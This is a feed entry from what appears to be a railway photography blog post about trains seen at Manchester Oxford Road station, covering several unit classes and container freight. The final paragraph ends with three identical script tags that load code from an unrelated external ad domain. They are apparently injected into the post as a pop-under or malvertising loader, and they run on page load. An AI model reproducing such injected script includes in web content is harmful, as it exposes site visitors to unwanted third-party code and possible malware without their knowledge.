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	<title>Where Worlds Collide &#187; Manchester Oxford Road</title>
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		<title>Manchester Oxford Road</title>
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		<pubDate>Sun, 10 Apr 2016 22:13:24 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Railway Photography]]></category>
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		<description><![CDATA[A Monday morning at Oxford Road station in Manchester. <a href="http://www.kalyr.co.uk/weblog/railways/railway-photography/manchester-oxford-road/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
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<p>Manchester Oxford Road is a strange place. The cramped inner-city location hemmed in by buildings on all sides makes it look like a full-sized model railway rather than a real station. Here a Trans-Pennine Express emerges from the fiddle yard between the two buildings that hide the hole in the sky<br />
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<p>New to Manchester are the former Thameslink class 319s, now used on Liverpool to Manchester services. This is one of the liveries of the <a title="Graham Farish 2016 Programme" href="http://www.kalyr.co.uk/weblog/railways/modelling-news/graham-farish-2016-programme/">forthcoming Graham Farish model</a>.</p>
<p><a href="https://kalyr.smugmug.com/Trains/North-and-East/Manchester-Oxford-Road/i-b2fg8CC/A"><img alt="" src="https://kalyr.smugmug.com/Trains/North-and-East/Manchester-Oxford-Road/i-b2fg8CC/0/M/DSC08613-M.jpg" /></a></p>
<p>The other new train to be seen in the Manchester area is First Trans-Pennine&#8217;s electric class 350s used on the Manchester to Glasgow run. Unlike Northern&#8217;s former London hand-me-downs, this line gets brand-new trains.</p>
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<p>A Northern class 150 sprinter enters from the Manchester Piccadilly direction. The platforms of the station are too short for inter-city length trains; back in the days when Virgin Trains operated between Manchester and Scotland their HSTs and Voyagers couldn&#8217;t stop because they were too loong for the model railway like platforms.</p>
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<p>A lot of freightÂ  passes through Oxford Road, mostly intermodal trains cannying boxes of Made-on-China goods to the vast container terminal at Trafford Park. Her&#8217;s a modellable short train made up of two pairs on Freightliner container twins. I&#8217;m guessing these wagons are returning from maintenance; quite a few of these wagons were undergoing tyre turning at Longsight.</p>
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<p>Oxford Road is an extremely busy station, especially for its size, and sees trains from four different train operating companies. Here&#8217;s a pair a venerable class 158 Sprinters on an East Midlands Trains&#8217; Liverpool to Norwich working.</p>
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<p>And finally, an Arriva Trains Wales class 175 on a working from North Wales. Sometimes known as &#8220;Hippos&#8221;, they&#8217;re hardly the most attractive-looking trains on the network, but in terms of passenge environment they&#8217;re one of the better modern units.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
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